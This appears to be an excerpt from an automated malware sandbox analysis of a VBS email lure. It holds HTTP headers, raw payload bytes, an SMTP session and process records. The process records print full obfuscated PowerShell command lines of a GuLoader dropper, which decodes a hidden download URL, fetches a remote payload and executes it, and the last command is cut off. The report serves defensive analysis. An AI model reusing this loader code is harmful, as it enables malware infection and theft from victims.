                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                    Accept-Ranges: bytes
                                    Content-Length: 244288
                                    Last-Modified: Tue, 02 Jul 2024 08:26:03 GMT
                                    X-GUploader-UploadID: ACJd0NqUb8Z5V1MYCTHDYsWseohwXe_A-kK4TV5SsYfkVo__GXIIhizc-5Fg9vzCz7BqwRostGQbPLVlAg
                                    Date: Wed, 03 Jul 2024 06:46:24 GMT
                                    Expires: Wed, 03 Jul 2024 06:46:24 GMT
                                    Cache-Control: private, max-age=0
                                    X-Goog-Hash: crc32c=Hh/RLA==
                                    Server: UploadServer
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close
                                    2024-07-03 06:46:25 UTC4826INData Raw: 8f 04 f3 93 69 e2 01 7e d0 da ca c5 f0 ad 4f 77 43 0b 3d 00 60 fe 31 1d 18 e3 3e 5f 28 ff 6d 09 0f 9e ad 12 77 2f d3 1a 63 e4 74 95 e4 6d ef ae 37 12 28 43 cf 2d 8c ed e7 04 b9 8c 3b 36 00 a4 e4 9d 86 1e 95 e2 75 af 5e a8 25 de 41 12 85 89 ea 2f 33 8b 8d fb 8e 79 dc 86 10 47 d0 26 6a 7f e0 9c 65 f3 66 90 f8 f0 22 6f c6 66 b1 53 5a 92 42 fe b4 15 bf 57 ae fd b2 49 a7 05 60 ba 58 f0 7d 96 4c 65 2a 9c a1 ec fb cf 04 ea 1a 35 e2 8e a1 33 9a fd 12 78 13 69 9c 46 e1 88 25 9d 52 61 92 fa bc 44 ba 40 12 40 8c af 96 ba a5 bb ce d1 b9 b0 6f b2 10 db 9c 67 bc 47 92 6b fe d8 25 ff d8 de 21 70 06 5c ca a9 c0 cb d6 db 3c cf c5 b5 6a db 99 ff 1c 2b 8f 57 7b ec 6a 0e eb f8 f3 55 01 31 3e c4 0a 61 e8 06 b2 ba b7 91 fb 58 c5 b9 a8 d4 42 53 30 8e 0c 52 4c 49 07 88 3f 5e 80
                                    Data Ascii: i~OwC=`1>_(mw/ctm7(C-;6u^%A/3yG&jef"ofSZBWI`X}Le*53xiF%RaD@@ogGk%!p\<j+W{jU1>aXBS0RLI?^
                                    2024-07-03 06:46:25 UTC4826INData Raw: 15 b1 c1 1e 99 8e 60 24 7e 80 e3 9e f5 8a 28 91 db 93 34 6a 73 bf 41 e7 30 8f 58 8f 90 b1 f8 16 a6 37 96 cc 1a 84 bc 6f 08 9d 1c 71 3d e6 ec 66 12 71 3d 33 14 6d b2 09 bb a6 8e 83 67 16 f3 32 32 09 11 ef 2d 5b 0d f0 63 fa 89 b9 7d 85 b1 ec 93 1f 5a 20 3e 8c 5b 6d 4d 0f 80 34 79 f1 08 eb 5a 70 18 61 9f c8 7b 8b 88 2e 82 b8 0a 18 d0 bf 14 60 d8 69 a3 c6 1d 7f 3d 4a af ad ed e9 e6 d8 72 89 41 bd c2 14 8d ea b0 5f f4 a7 c4 b9 6e eb 80 38 79 1d 64 90 97 17 c1 e1 e5 89 c5 a9 39 e1 88 a2 1f 9c 6a 44 25 4e d4 00 64 d9 a0 e3 55 12 81 58 4e 06 e8 53 5c 19 ab fd c8 1d 99 b4 72 d7 b1 9a 97 0a 75 fc f4 e9 fd 1b 35 c9 96 09 fe 76 b4 e1 ac fe 28 40 f9 61 42 a2 83 4c 0e 21 99 41 6d 92 57 13 87 ce 0c c7 b9 db 70 40 c1 cf 71 e7 11 7d b8 f3 8f bd f7 f8 cb af 52 d1 85 01 e4
                                    Data Ascii: `$~(4jsA0X7oq=fq=3mg22-[c}Z >[mM4yZpa{.`i=JrA_n8yd9jD%NdUXNS\ru5v(@aBL!AmWp@q}R
                                    2024-07-03 06:46:25 UTC222INData Raw: 8c b2 0a 73 27 d2 2f 2d 32 89 c3 1b da 88 90 d0 29 85 4b f3 f3 97 e4 bc f6 41 e4 34 d4 ca 7d a7 2a 5b ca 3b 41 15 3b 4d 21 3a 39 03 48 07 9b e4 12 6a 64 05 d8 1e ad d3 51 fd 5b 7b 4d dd ed 77 3d ab 1d fb a9 a9 b1 35 fc 2c 8d ba 1e c5 2f 23 63 48 12 98 29 5c 44 6b 62 27 97 09 24 27 28 e3 66 84 49 ea b3 2c ba 31 da f8 b1 21 77 25 9c bd 40 c5 42 51 51 ac 35 d8 ee 79 e6 e2 3c c8 3f e3 61 13 02 87 a2 f1 9c 69 8d a4 4a 50 e0 99 68 05 19 a2 e9 c7 94 12 87 a7 57 fa 9a 04 8c ce c2 ee 31 b8 84 95 cf 76 7b d7 60 be 2c 93 08 7c 82 89 d9 7b 45 0a 53 e0 1e ab 95 a5 30 ac 87 bc 3d da a1 1e 63 ee 41 50 82 7d 96 6a 1e 64 8a f2 a4 1f 3b 78 9c 6a c5 bd 33 a5 63 2e 5d 31 cf df
                                    Data Ascii: s'/-2)KA4}*[;A;M!:9HjdQ[{Mw=5,/#cH)\Dkb'$'(fI,1!w%@BQQ5y<?aiJPhW1v{`,|{ES0=cAP}jd;xj3c.]1
                                    2024-07-03 06:46:25 UTC1322INData Raw: 6f e3 76 10 b3 dc 31 e8 5c 52 c9 32 16 86 48 82 81 ff ec 34 f9 92 15 ca e0 d6 2b 09 01 fb 4f 12 f3 27 72 40 5c af ca c5 f2 17 69 41 04 f1 ed b9 02 e2 e4 3c c7 8d f3 6a d4 58 ac 06 f4 ce 9d 6e c7 6b de 27 82 98 06 b1 7e 31 8e a7 cc 2e 14 1a 3c c6 2b 2a 79 de 9e 79 69 f3 bf 9a 10 b3 69 1a 74 7d d8 4a ca 8f 89 ff 50 08 e8 46 93 10 9d fc c5 03 78 92 32 35 7b 29 cb c1 04 13 fa 30 ee 19 44 5c 79 b6 00 db 02 9f 87 ee 12 c4 62 0b 54 17 1e 35 a6 71 56 12 b2 f9 f3 b0 b0 45 90 fc 7a 34 4f a1 a5 92 ab 35 78 c7 2e ae c2 9a 98 1a 66 18 fa dc e0 17 3a 4a d8 3f 8d 20 9a a2 b6 54 57 9f 09 00 cb 2c c1 3f 1b 94 89 b5 39 d2 ce a2 c4 2d 02 e9 58 c2 74 ac e0 16 68 83 52 33 d6 f0 7d 63 19 e5 42 3f 71 e7 f9 6e 2e fb c5 58 6d 59 2c 7c c5 0a 67 91 2a c2 f9 97 9d b4 95 c0 08 98 c1
                                    Data Ascii: ov1\R2H4+O'r@\iA<jXnk'~1.<+*yyiit}JPFx25{)0D\ybT5qVEz4O5x.f:J? TW,?9-XthR3}cB?qn.XmY,|g*
                                    2024-07-03 06:46:25 UTC1390INData Raw: df ac a0 37 6e ba 76 5e 8c 13 2c 29 05 fc 10 08 30 20 90 da db b5 38 66 27 95 f4 83 21 0c a3 77 a1 44 a4 d4 c0 5a 86 f8 14 c9 f0 26 25 ae fe bd 7d ed a5 ac f6 67 00 e1 df 1a 9c c9 80 02 91 81 e7 3c 00 cb 0e a9 30 84 a0 84 80 7d 9d 7c 04 5c 76 0e a5 46 84 d2 3d ee 9c ca 27 c7 fa c7 bb 0d 89 6f ea fd b3 2c 5b 42 27 df 3b 5f 0e d2 70 33 3f 23 35 b7 e0 5f 52 72 4c b0 ad 9c 01 72 29 e4 d3 48 06 33 20 6d 68 d9 34 eb 3b 14 ab 96 cc 29 b0 ab b9 20 36 07 9d d8 ec d3 d2 f6 dc b3 43 a6 9f 7c a8 7b 34 0e 96 e6 25 9d 4b 1c 97 2e 94 8b 64 e4 13 5b a6 1f fa 74 b0 85 2b 50 eb e0 d9 3f 0b 16 37 89 8e 23 ed 58 91 9a 8e 2d 36 4a ce c4 ca 7c 36 96 b8 11 83 89 6f cf 7c 0f 55 dd 8e e5 5e c9 13 6b fd 6a 56 a2 f3 2b e8 9d 75 67 80 84 54 3d bf 83 71 22 ae a8 bb ae 8c f8 13 36 19
                                    Data Ascii: 7nv^,)0 8f'!wDZ&%}g<0}|\vF='o,[B';_p3?#5_RrLr)H3 mh4;) 6C|{4%K.d[t+P?7#X-6J|6o|U^kjV+ugT=q"6
                                    2024-07-03 06:46:25 UTC1390INData Raw: a7 d5 09 4d 27 f4 78 d2 35 ad 89 62 b8 a0 55 aa 24 ae 91 38 c2 a5 1e c2 6e d6 59 c0 8a 88 23 af 51 e9 62 58 b5 68 42 95 a6 c7 9f d7 9b f3 7f f9 69 eb 2b 01 9a 44 24 ff b1 43 b4 bd 28 55 ae 3e 23 c2 3b 6e bd d7 6f 1d 10 05 fb 9c 15 2d 1d dc 75 f1 f1 d4 b7 06 e1 cc 5e d9 0a c9 01 d7 bf a8 0a 11 19 09 d3 98 03 9b 44 f1 72 13 59 bb 7d 79 11 04 70 19 b7 41 69 c4 7d ea a0 c8 ce 98 24 a9 c7 e8 17 96 e2 0e cc 5a a8 21 20 b0 ed 85 a9 50 2f 33 8b 73 f5 8d 79 9c 78 1c 44 d0 06 69 7f e0 9c 9b f2 5f 8f f8 f0 22 91 ca 67 b1 ad 53 93 42 d6 de 15 bf 5d da ef b2 49 a5 fb ee b8 58 d0 77 89 f6 6b d4 26 ab 21 da 89 09 a5 d7 34 b4 e6 c8 40 44 8c 59 06 74 1b fd d5 cd eb 44 0d 32 0f e6 fa dd 21 9a 32 99 20 af c6 f8 64 ed f7 9d d1 d0 df 0b d7 c0 d7 a8 4e 98 47 92 95 f7 d8 25 83
                                    Data Ascii: M'x5bU$8nY#QbXhBi+D$C(U>#;no-u^DrY}ypAi}$Z! P/3syxDi_"gSB]IXwk&!4@DYtD2!2 dNG%
                                    2024-07-03 06:46:25 UTC1390INData Raw: 65 a0 c6 1d 7d 3d 4a af ad e2 d0 d6 d8 8c 85 bf b1 e0 1f ad ea b1 a1 f5 c7 84 bf 6e eb b8 8c 86 e2 9b 21 1e 16 c1 78 cf 89 c5 cf 2a d1 8e 13 b3 62 95 cd d8 b1 2b 31 40 d9 a0 e3 ab e2 8c 5c 4e c0 db 51 5c 39 a9 03 c4 19 67 95 49 c1 b1 9a 69 f5 46 7f f4 c1 96 e5 39 c2 68 74 ef 74 94 e4 52 f0 2a be 09 6e 40 a2 0f 41 0d 21 c9 3c 59 93 57 e9 78 fb 04 c7 91 d2 70 60 c6 bd 64 e7 ef 03 93 e7 8f 43 f1 05 c5 8c 5e 2f 88 02 1a bb 66 38 4b 4b 90 01 6a b2 fc e4 90 90 4e a7 d4 2d 1c d4 08 ff 79 4d 03 36 88 ed 13 9c 36 f0 ee 2e 80 33 d4 74 b8 57 96 e6 ef 31 9a c0 35 e7 57 f8 c3 d9 10 6f 74 5f f4 1d c3 5b 64 cf 21 ba 3e 30 a7 20 d3 f7 94 ac 7d c1 53 5a 93 22 da 72 f8 fa 02 bf b4 36 73 e1 81 34 cb 8b 85 8c 79 86 f3 14 e8 25 dc 5a 08 09 9c a8 2d cd c4 1e 8b b3 0d 26 b0 0a
                                    Data Ascii: e}=Jn!x*b+1@\NQ\9gIiF9httR*n@A!<YWxp`dC^/f8KKjN-yM66.3tW15Wot_[d!>0 }SZ"r6s4y%Z-&
                                    2024-07-03 06:46:25 UTC1390INData Raw: 44 7f 15 8c a7 ec 36 24 18 3c d8 25 26 79 d0 60 75 74 d3 9f 9c 10 b3 97 ea 77 44 a6 cb ca 8f 77 f3 a4 04 af 4b b3 11 9d 8b c7 fd 79 83 d1 ca 84 33 35 c8 04 c5 80 44 ee dd 40 74 0e ae 04 d1 38 ea 79 11 ed cd 62 0b 54 66 e3 3b a4 23 55 ec be a9 f0 90 b2 17 93 fc 84 65 74 b3 a5 b2 ac 15 78 c7 d0 a0 30 94 98 e4 4a 17 fa fc f0 e9 34 48 26 3e 4a 37 98 a2 96 aa 5b 9b 09 d6 89 15 cb 35 97 d6 89 95 39 2c c0 a2 3a 03 11 e9 58 3c 86 a0 ec 36 6b 7d 5e 3f 28 d1 65 66 19 e5 bc 06 4d f1 f9 6e 16 7f 36 ae 92 c8 63 7c c5 7b ec 9f 2a c6 fc 4b 93 b5 95 c0 0b 94 c1 24 1f e6 e5 b0 07 f9 ee 8a b7 4c bf af 04 5f 60 e6 e3 57 eb 4f 2d e0 ee 7e fa 32 f8 10 5f 3c 36 41 23 ad f1 82 d4 dc 1e 1f a8 d7 e5 2b db 7b c8 e4 7f 45 d0 23 9e c8 72 b0 d1 1a 24 23 e4 71 e9 5d fc 79 5e 19 6d aa
                                    Data Ascii: D6$<%&y`utwDwKy35D@t8ybTf;#Uetx0J4H&>J7[59,:X<6k}^?(efMn6c|{*K$L_`WO-~2_<6A#+{E#r$#q]y^m
                                    2024-07-03 06:46:25 UTC1390INData Raw: 12 83 d9 c8 57 94 8b ba 24 1e 53 63 d6 e6 8c eb 09 d2 b3 43 a6 99 7c a8 7b 34 01 a6 c4 25 63 47 eb 9e 0e 94 ae 1f 90 ed 5a 9b 67 d1 71 b0 f5 23 4a eb e0 d3 bc 71 1f 37 8d 50 2a e4 58 b1 60 80 2d 36 b4 31 f1 cf 7c 16 a5 80 14 83 77 6e ce 23 f0 aa 22 0e ce 5f c9 37 61 e1 6a 56 e8 10 a0 e8 9d 55 2d a2 84 54 c7 99 d6 71 22 5a 5a b5 ae ac 9d 45 36 19 79 7e 68 4c f5 24 ca fd 8c fc 0a 73 27 d2 2f 21 32 b1 c6 12 da 88 b0 21 25 89 4b 2d ee ae f3 bc 08 40 23 14 d5 ca 5d 42 27 5d ca 00 e4 18 3b 49 ff 26 3e 03 68 f9 95 e4 12 94 97 0f d8 65 ce 89 51 f9 73 c5 4c e4 f0 57 20 ab e3 f2 56 a7 9d 4f fc d2 81 f6 5f e4 37 23 43 13 ec 99 10 82 4a 6b 62 d9 65 01 24 f7 00 ff 66 85 61 55 b2 15 92 19 98 f8 4f 22 89 2b b9 c6 14 dc 42 55 23 6b 3e d4 9e 51 03 ee 30 c2 62 8e 61 13 06
                                    Data Ascii: W$ScC|{4%cGZgq#Jq7P*X`-61|wn#"_7ajVU-Tq"ZZE6y~hL$s'/!2!%K-@#]B'];I&>heQsLW VO_7#CJkbe$faUO"+BU#k>Q0ba
                                    2024-07-03 06:46:25 UTC1390INData Raw: 9e 94 85 89 52 6f 75 70 72 04 ae 21 9c 86 10 b9 de 26 6a 7f 1e 90 65 f3 46 8e f8 f0 22 91 c7 5f a6 53 5a 92 bc f7 b5 15 9f 72 ae fd b2 09 32 f9 1f 45 78 ef 73 89 f6 95 24 28 a8 21 24 7b 05 a6 f7 1e b6 e6 c8 be bb b4 42 17 74 1b 03 22 c1 eb 61 88 48 0e e6 de ac ac 9f 32 17 06 b7 c6 f8 90 9c 80 9d f1 d0 ff 00 d7 3e d6 6f 63 98 47 92 95 f2 d8 25 df b1 9b 21 70 b4 5c f0 be a5 05 be 43 35 ce c5 95 67 db 99 ff bc 07 8c 56 70 cd 5b 0e eb 48 0e 5b 01 39 3e 3a 06 61 e8 26 7b 74 b4 91 05 79 fc b3 a8 34 41 79 10 e6 4c 52 4c 97 09 88 3f 5c 7e 23 d6 67 f9 69 c3 2d c7 17 c9 ef 10 e2 6b d6 b0 e7 96 5a 11 c2 37 14 05 e9 2a 78 2c ac 7b 8c ee c1 10 98 12 2f 90 b4 0c 93 11 2b cd bc 0d 77 81 9e ba 38 9f 40 07 04 56 75 5e ad 02 74 12 40 62 a4 34 96 ab 25 8e 1a fd 55 d7 c4 53
                                    Data Ascii: Roupr!&jeF"_SZr2Exs$(!${Bt"aH2>ocG%!p\C5gVp[H[9>:a&{ty4AyLRL?\~#gi-kZ7*x,{/+w8@Vu^t@b4%US


                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Jul 3, 2024 08:46:28.532180071 CEST58749710195.128.154.10192.168.2.7220-srv03.hostingrd.pl ESMTP Exim 4.97.1 #2 Wed, 03 Jul 2024 08:46:27 +0200
                                    220-We do not authorize the use of this system to transport unsolicited,
                                    220 and/or bulk e-mail.
                                    Jul 3, 2024 08:46:28.536672115 CEST49710587192.168.2.7195.128.154.10EHLO 124406
                                    Jul 3, 2024 08:46:28.728802919 CEST58749710195.128.154.10192.168.2.7250-srv03.hostingrd.pl Hello 124406 [8.46.123.33]
                                    250-SIZE 52428800
                                    250-8BITMIME
                                    250-PIPELINING
                                    250-PIPECONNECT
                                    250-AUTH PLAIN LOGIN
                                    250-STARTTLS
                                    250 HELP
                                    Jul 3, 2024 08:46:28.754594088 CEST49710587192.168.2.7195.128.154.10STARTTLS
                                    Jul 3, 2024 08:46:28.951113939 CEST58749710195.128.154.10192.168.2.7220 TLS go ahead

                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:02:43:39
                                    Start date:03/07/2024
                                    Path:C:\Windows\System32\wscript.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"
                                    Imagebase:0x7ff6d6000000
                                    File size:170'496 bytes
                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:16
                                    Start time:03:52:23
                                    Start date:03/07/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:17
                                    Start time:03:52:23
                                    Start date:03/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:18
                                    Start time:03:52:26
                                    Start date:03/07/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
                                    Imagebase:0x7ff7f2540000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:20
                                    Start time:03:52:35
                                    Start date:03/07/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens 